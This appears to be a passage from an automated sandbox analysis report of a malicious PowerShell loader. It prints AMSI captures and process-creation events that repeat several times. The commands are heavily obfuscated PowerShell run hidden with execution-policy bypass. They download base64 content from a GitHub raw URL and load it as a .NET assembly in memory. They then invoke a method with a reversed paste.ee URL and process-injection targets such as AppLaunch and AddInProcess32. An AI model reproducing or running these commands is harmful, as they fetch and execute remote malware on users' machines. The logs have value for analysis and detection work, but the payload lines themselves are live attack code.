Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') 